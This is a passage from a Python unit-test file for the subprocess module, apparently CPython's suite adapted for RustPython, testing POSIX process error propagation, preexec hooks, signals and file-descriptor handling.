stacks = traceback.format_exc() # assertRaises doesn't give this.
else:
self.fail("TimeoutExpired not raised.")
self.assertLess(after_secs - before_secs, 1.5,
msg="TimeoutExpired was delayed! Bad traceback:\n```\n"
f"{stacks}```")
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
# We mock the __del__ method for Popen in the next two tests
# because it does cleanup based on the pid returned by fork_exec
# along with issuing a resource warning if it still exists. Since
# we don't actually spawn a process in these tests we can forego
# the destructor. An alternative would be to set _child_created to
# False before the destructor is called but there is no easy way
# to do that
class PopenNoDestructor(subprocess.Popen):
def __del__(self):
pass
# TODO: RUSTPYTHON
@unittest.expectedFailure
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_normal(self, fork_exec):
"""Test error passing done through errpipe_write in the good case"""
def proper_error(*args):
errpipe_write = args[13]
# Write the hex for the error code EISDIR: 'is a directory'
err_code = '{:x}'.format(errno.EISDIR).encode()
os.write(errpipe_write, b"OSError:" + err_code + b":")
return 0
fork_exec.side_effect = proper_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(IsADirectoryError):
self.PopenNoDestructor(["non_existent_command"])
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_bad_data(self, fork_exec):
"""Test error passing done through errpipe_write where its not
in the expected format"""
error_data = b"\xFF\x00\xDE\xAD"
def bad_error(*args):
errpipe_write = args[13]
# Anything can be in the pipe, no assumptions should
# be made about its encoding, so we'll write some
# arbitrary hex bytes to test it out
os.write(errpipe_write, error_data)
return 0
fork_exec.side_effect = bad_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(subprocess.SubprocessError) as e:
self.PopenNoDestructor(["non_existent_command"])
self.assertIn(repr(error_data), str(e.exception))
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipIf(not os.path.exists('/proc/self/status'),
"need /proc/self/status")
def test_restore_signals(self):
# Blindly assume that cat exists on systems with /proc/self/status...
default_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=False)
for line in default_proc_status.splitlines():
if line.startswith(b'SigIgn'):
default_sig_ign_mask = line
break
else:
self.skipTest("SigIgn not found in /proc/self/status.")
restored_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=True)
for line in restored_proc_status.splitlines():
if line.startswith(b'SigIgn'):
restored_sig_ign_mask = line
break
self.assertNotEqual(default_sig_ign_mask, restored_sig_ign_mask,
msg="restore_signals=True should've unblocked "
"SIGPIPE and friends.")
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c", "import os; print(os.getsid(0))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_sid = os.getsid(0)
child_sid = int(output)
self.assertNotEqual(parent_sid, child_sid)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals intenum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def _check_swap_std_fds_with_one_closed(self, from_fds, to_fds):
saved_fds = self._save_fds(range(3))
try:
for from_fd in from_fds:
with tempfile.TemporaryFile() as f:
os.dup2(f.fileno(), from_fd)
fd_to_close = (set(range(3)) - set(from_fds)).pop()
os.close(fd_to_close)
arg_names = ['stdin', 'stdout', 'stderr']
kwargs = {}
for from_fd, to_fd in zip(from_fds, to_fds):
kwargs[arg_names[to_fd]] = from_fd
code = textwrap.dedent(r'''
import os, sys
skipped_fd = int(sys.argv[1])
for fd in range(3):
if fd != skipped_fd:
os.write(fd, str(fd).encode('ascii'))
''')
skipped_fd = (set(range(3)) - set(to_fds)).pop()
rc = subprocess.call([sys.executable, '-c', code, str(skipped_fd)],
**kwargs)
self.assertEqual(rc, 0)
for from_fd, to_fd in zip(from_fds, to_fds):
os.lseek(from_fd, 0, os.SEEK_SET)
read_bytes = os.read(from_fd, 1024)
read_fds = list(map(int, read_bytes.decode('ascii')))
msg = textwrap.dedent(f"""
When testing {from_fds} to {to_fds} redirection,
parent descriptor {from_fd} got redirected
to descriptor(s) {read_fds} instead of descriptor {to_fd}.
""")
self.assertEqual([to_fd], read_fds, msg)
finally:
self._restore_fds(saved_fds)
# Check that subprocess can remap std fds correctly even
# if one of them is closed (#32844).
def test_swap_std_fds_with_one_closed(self):
for from_fds in itertools.combinations(range(3), 2):
for to_fds in itertools.permutations(range(3), 2):
self._check_swap_std_fds_with_one_closed(from_fds, to_fds)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
ZERO_RETURN_CMD,
preexec_fn=prepare)
except ValueError as err:
# Pure Python implementations keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process
env['LC_ALL'] = 'C'
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(ZERO_RETURN_CMD[0])
args = list(ZERO_RETURN_CMD[1:])
path, program = os.path.split(ZERO_RETURN_CMD[0])
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program]+args)
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'%s' %s" % (abs_program, " ".join(args).encode("utf-8"))
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program]+args, env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program]+args, env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
@unittest.skip("TODO: RUSTPYTHON, flaky test")
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=fds_to_keep)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest processes maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE aftr setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave a two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
@unittest.skip("TODO: RUSTPYTHON, flaky test")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
ZERO_RETURN_CMD,
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
